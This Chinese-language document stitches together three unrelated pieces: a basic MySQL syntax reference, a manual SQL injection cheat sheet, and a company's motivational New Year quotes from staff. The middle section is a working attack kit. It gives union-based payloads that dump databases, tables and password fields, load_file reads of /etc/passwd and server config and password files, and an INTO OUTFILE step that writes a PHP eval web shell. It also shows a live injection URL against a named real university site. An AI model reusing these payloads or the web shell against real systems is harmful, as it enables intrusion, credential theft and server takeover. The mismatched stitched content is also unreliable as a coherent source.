MySQL 经典语句总结

（侯惠阳 PHPer.yang）

SELECT

SELECT 列名称 FROM 表名称

SELECT LastName,FirstName FROM Persons

SELECT * FROM Persons

SELECT DISTINCT 列名称 FROM 表名称

SELECT DISTINCT Company FROM Orders //去除重复的distinct

WHERE

SELECT 列名称 FROM 表名称 WHERE 列 运算符 值

SELECT * FROM Persons WHERE City='Beijing'

SELECT * FROM Persons WHERE Year>1965

INSERT INTO

INSERT INTO 表名称 VALUES (值1, 值2,....)

INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)

INSERT INTO Persons VALUES ('Gates', 'Bill', 'Xuanwumen 10', 'Beijing')

INSERT INTO Persons (LastName, Address) VALUES ('Wilson', 'Champs-Elysees')

Insert into table () select * from name; //直接读取数据插入数据

Update

UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值

UPDATE Person SET FirstName = 'Fred' WHERE LastName = 'Wilson'

UPDATE Person SET Address = 'Zhongshan 23', City = 'Nanjing'

WHERE LastName = 'Wilson'

DELETE

DELETE FROM 表名称 WHERE 列名称 = 值

DELETE FROM Person WHERE LastName = 'Wilson'

DELETE FROM table_name

ORDER BY

SELECT Company, OrderNumber FROM Orders ORDER BY Company

SELECT Company, OrderNumber FROM Orders ORDER BY Company, OrderNumber SELECT Company, OrderNumber FROM Orders ORDER BY Company DESC

SELECT Company, OrderNumber FROM Orders ORDER BY Company DESC, OrderNumber ASC

AND & OR

SELECT * FROM Persons WHERE FirstName='Thomas' AND LastName='Carter'

SELECT * FROM Persons WHERE firstname='Thomas' OR lastname='Carter'

SELECT * FROM Persons WHERE (FirstName='Thomas' OR FirstName='William')

AND LastName='Carter'

IN

SELECT 列名称 FROM 表名称 WHERE 列名称 IN (值1,值2,..)

SELECT * FROM Persons WHERE LastName IN ('Adams','Gates')

BETWEEN ... AND

SELECT 列名称 FROM 表名称 WHERE 列名称 BETWEEN 值1 AND 值2

SELECT * FROM Persons WHERE LastName BETWEEN 'Adams' AND 'Carter'

SELECT * FROM Persons WHERE LastName NOT BETWEEN 'Adams' AND 'Carter'

Alias

SELECT 列名称 AS 列的别名 FROM 表名称

SELECT 列名称 FROM 表名称 AS 表的别名

SELECT LastName AS Family, FirstName AS Name FROM Persons

SELECT LastName, FirstName FROM Persons AS Employees

Join

SELECT * FROM tx1 left join (tx2, tx3) ON (tx1.id=tx2.tid AND tx2.tid=tx3.tid) where tx1.id = 3

SELECT * FROM t1 LEFT JOIN (t2, t3, t4)

ON (t2.a=t1.a AND t3.b=t1.b AND t4.c=t1.c)

等价于：

SELECT * FROM t1 LEFT JOIN (t2 CROSS JOIN t3 CROSS JOIN t4)

ON (t2.a=t1.a AND t3.b=t1.b AND t4.c=t1.c)

在MySQL中，CROSS JOIN语法上等价于INNER JOIN (它们可以彼此代替。在标准SQL中，它们不等价。INNER JOIN结合ON子句使用；CROSS JOIN 用于其它地方。 SELECT Employees.Name, Orders.Product FROM Employees, Orders

WHERE Employees.Employee_ID = Orders.Employee_ID

SELECT Employees.Name

FROM Employees, Orders

WHERE Employees.Employee_ID = Orders.Employee_ID

AND Orders.Product = 'Printer'

SELECT 字段1, 字段2, 字段3

FROM 第一个表

INNER JOIN 第二个表

ON 第一个表.keyfield = 第二个表.foreign_keyfield

SELECT Employees.Name, Orders.Product

FROM Employees

INNER JOIN Orders

ON Employees.Employee_ID=Orders.Employee_ID

SELECT field1, field2, field3

FROM first_table

LEFT JOIN second_table

ON first_table.keyfield = second_table.foreign_keyfield

SELECT Employees.Name, Orders.Product

FROM Employees

LEFT JOIN Orders

ON Employees.Employee_ID=Orders.Employee_ID

SELECT field1, field2, field3

FROM first_table

RIGHT JOIN second_table

ON first_table.keyfield = second_table.foreign_keyfield

SELECT Employees.Name, Orders.Product

FROM Employees

RIGHT JOIN Orders

ON Employees.Employee_ID=Orders.Employee_ID

SELECT Employees.Name

FROM Employees

INNER JOIN Orders

ON Employees.Employee_ID=Orders.Employee_ID

WHERE Orders.Product = 'Printer'

cross join ：笛卡尔交集。

Inner join ：内连接。

left join ：只要满足左边表的需求就可以了,右表有无都可以。

right join ：只要满足右表的需求就可以了,左表有无都可以。

UNION

SQL Statement 1

UNION

SQL Statement 2

注意：查看一样的字段,union 是将两个结果集并在一起,筛选出重复的数据, union all 只是简单的将两个结果结果合并,但是union all 比union 快。

SELECT E_Name FROM Employees_China

UNION

SELECT E_Name FROM Employees_USA

SQL Statement 1

UNION ALL

SQL Statement 2

Create

CREATE DATABASE 数据库名称

CREATE TABLE 表名称

(

列名称1 数据类型,

列名称2 数据类型,

.......

)

CREATE TABLE Person

(

LastName varchar,

FirstName varchar,

Address varchar,

Age int

)

CREATE TABLE Person

(

LastName varchar(30),

FirstName varchar,

Address varchar,

Age int(3)

)

CREATE UNIQUE INDEX 索引名称

ON 表名称 (列名称)

CREATE INDEX 索引名称

ON 表名称 (列名称)

CREATE INDEX PersonIndex

ON Person (LastName)

CREATE INDEX PersonIndex

ON Person (LastName DESC)

CREATE INDEX PersonIndex

ON Person (LastName, FirstName)

Drop

DROP INDEX index_name ON table_name

DROP TABLE 表名称

DROP DATABASE 数据库名称

TRUNCATE TABLE 表名称

ALTER TABLE

ALTER TABLE 表名称 ADD 列名称 数据类型

ALTER TABLE 表名称 DROP COLUMN 列名称

ALTER TABLE Person ADD City varchar(30)

ALTER TABLE Person DROP COLUMN Address

FUNCTIONS

SELECT function(列) FROM 表

GROUP BY 以及 HAVING

SELECT column,SUM(column) FROM table GROUP BY column

SELECT Company,SUM(Amount) FROM Sales

GROUP BY Company

SELECT column,SUM(column) FROM table

GROUP BY column

HAVING SUM(column) condition value

SELECT Company,SUM(Amount) FROM Sales

GROUP BY Company

HAVING SUM(Amount)>10000

SELECT INTO

SELECT column_name(s) INTO newtable [IN externaldatabase] FROM source

SELECT * INTO Persons_backup FROM Persons

SELECT LastName,Firstname INTO Persons_backup

FROM Persons

WHERE City='Sandnes'

Create View

CREATE VIEW 视图名称 AS SELECT 列名称 FROM 表名称 WHERE 条件

CREATE VIEW [Current Product List] AS

SELECT ProductID,ProductName

FROM Products

WHERE Discontinued=No

CREATE VIEW [Products Above Average Price] AS

SELECT ProductName,UnitPrice

FROM Products

WHERE UnitPrice>(SELECT AVG(UnitPrice) FROM Products)

SELECT * FROM [Current Product List]

CREATE VIEW [Category Sales For 1997] AS

SELECT DISTINCT CategoryName,Sum(ProductSales) AS CategorySales

FROM [Product Sales for 1997]

GROUP BY CategoryName

SELECT * FROM [Category Sales For 1997]

WHERE CategoryName='Beverages'

正则匹配:

SELECT 列 FROM 表 WHERE 列 LIKE 模式

SELECT * FROM Persons WHERE FirstName LIKE 'B%'

SELECT * FROM Persons WHERE FirstName LIKE '%s'

SELECT * FROM Persons WHERE FirstName LIKE '%eo%'

SELECT * FROM Persons WHERE FirstName LIKE '___h' (下划线表示三个字符，表示匹配前面有三个字符最后面是h)

SELECT * FROM Persons WHERE FirstName LIKE [houhuiyang]; (匹配[]里面的所有字符) SELECT * FROM Persons WHERE FirstName LIKE [a-zA-Z]; (匹配[]里面小写a到z大写的A-Z)

SELECT * FROM Persons WHERE FirstName REGEXP ‘^[houhuiyang]’;(匹配正则表达式的内容)

第二篇：MySQL 手工注入语句总结

MySQL 手工注入语句总结:存查备用!

暴字段长度

Order by num/*

匹配字段

and 1=1 union select 1,2,3,4,5…….n/*

暴字段位置

and 1=2 union select 1,2,3,4,5…..n/*

利用内置函数暴数据库信息

version() database() user()

不用猜解可用字段暴数据库信息(有些网站不适用):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

操作系统信息：

and 1=2 union all select @@global.version_compile_os from mysql.user /*

数据库权限：

and ord(mid(user(),1,1))=114 /* 返回正常说明为root

暴库 (mysql>5.0)

Mysql 5 以上有内置库 information_schema，存储着mysql的所有数据库和表结构信息

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

猜表

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where

TABLE_SCHEMA=数据库（十六进制） limit 0（开始的记录，0为第一个开始记录）,1（显示1条记录）—

猜字段

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名（十六进制）limit 0,1

暴密码

and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1

高级用法（一个可用字段显示两个数据内容）：

Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1

直接写马(Root权限)

条件：

1、知道站点物理路径

2、有足够大的权限（可以用select ?. from mysql.user测试）

3、magic_quotes_gpc()=OFF

select ‘<?php eval($_POST[cmd])?>' into outfile ‘物理路径'

and 1=2 union all select 一句话HEX值 into outfile '路径'

load_file() 常用路径：

1、replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

3、load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件

5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件

6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.

7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

8、d:\APACHE\Apache2\conf\httpd.conf

9、C:\Program Files\mysql\my.ini

10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径

11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件

12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看

15、 /etc/sysconfig/iptables 本看防火墙策略

16 、usr/local/app/php5 b/php.ini PHP 的相当设置

17 、/etc/my.cnf MYSQL的配置文件

18、 /etc/redhat-release 红帽子的系统版本

19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

21、/usr/local/app/php5 b/php.ini //PHP相关设置

22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置

23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

24、c:\windows\my.ini

25、c:\boot.ini

网站常用配置文件

config.inc.php、config.php。load_file（）时要用replace（load_file(HEX)，char(60),char(32)）

注：

Char(60)表示 <

Char(32)表示 空格

手工注射时出现的问题：

当注射后页面显示：

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

如：http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20

这是由于前后编码不一致造成的，

解决方法：在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为：

http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20

既可以继续注射了。。。

第三篇：工作总结经典语录

20xx工作总结经典语录

我会每天给自己定一个工作计划，然后去认真完成自己定的任务，每

天都会如此。因为我想改变所以我相信一定会达到自己想要的结果，

嘉美是我事业平台的起点，我愿意在这个平台上和兄弟姐妹们一起共

创人生的辉煌！

文洋

我已经拥有了自己的会员，我也做出了自己的业绩，我相信我一定

有能力把这份工作做好。我时时告诫自己“如果让我贫穷我不愿意，

如果让我放弃我不愿意，如果让我不如别人我更不愿意”！

李铭

既然我选择了这份工作，我就一定要把它做好。如果我做不好，我姑

且不谈对不起公司领导，我也对不起我自己的承诺和付出，我更对不

起生我养我的父母！

张萍

我既是父母亲的儿女，又是儿女的母亲。所以我知道我肩负的责任，

我要活在当下，活出精彩，活出价值，活出别人对我的喝彩！ 何君

我要找回我进嘉美时的梦想，定下切实可行的计划，把工作落实到每

个环节，用行动来证明我的结果。我要做我人生的主角！ 程翠萍

我以前没有目标，没有规划，不知道自己奋斗的方向。自从进了嘉美

我感受到了生活的乐趣，工作的激情，目标的伟大。我知道改变是痛

苦的不改变更痛苦，所以我愿意选择用短暂的痛苦来换取长久的快

乐。我相信任何困难都不可以把我击垮，因为我渴望成功！

小段

我不敢想过去，因为我失去的太多了，我假设自己就是一个操作工要

想不被人看不起那我就必须使劲往上爬。我决定从头开始从现在开

始，实实在在做好自己。我不能再仰头看别人了，我要让别人都仰头

看着我！

周丽娜

我曾经对自己的人生和目标没有规划，就像黑夜在大海上随波逐流的

小舟。而进了嘉美我感觉人生有了灯塔，我知道自己要什么，我更知

道自己该做什么。我相信我自己只要付出比别人更多的努力，我也一

定会超越别人，为了成功，我不放弃，我绝不放弃，我绝不绝不放弃！

小曹

20xx年对于我来讲是个不平凡的一年。在嘉美我学到了宝贵的人生经验，销售技巧，沟通能力和胆识。如果当初选择进厂，可能这些东西我要用五年的时间才能学到。转眼间，传说中的20xx到了，去年的一切都是浮云。今年刚开始，希望我们在新的起点，打起12分精神来应对这一切。头炮打响，响一年，齐心协力，积极应对！

龙英梅

“没有谁能够随随便便成功”亲爱的伙伴们，我相信嘉美的成功，赵总的成功，一定离不开大家的努力。同时嘉美也给了我们一个锻炼，学习，成长的平台。“心有多大，舞台就有多大”既然20xx不是世界末日，那就让我们一起在嘉美的舞台上为嘉美的成功，自己的成功而努力奋斗吧！！！

吴盛涛

给自己一个信仰、给自己一个方向、给自己一段时光，让我们携手共同学习、共同成长、一起进步！20xx寻志同者、生死同行、肝胆相照！

吴浩然

我喜欢嘉美事业平台，因为带给我更多的健康和快乐；我喜欢这帮孩子；因为带给我更多的激情和梦想。我愿意紧紧跟随赵总，紧密团结在姚总的周围，以饱满的热情，全力以赴的态度，和大家一起把嘉美事业推向一个新的高度，共创20xx年的辉煌！

朱老师

对于会所来说，老板及管理者只要照顾好自己的员工，员工才能照顾好自己的会员，会员自然会照顾好会所的生意，这就是会所健康发展的“铁三角”。

姚总 20xx-1-4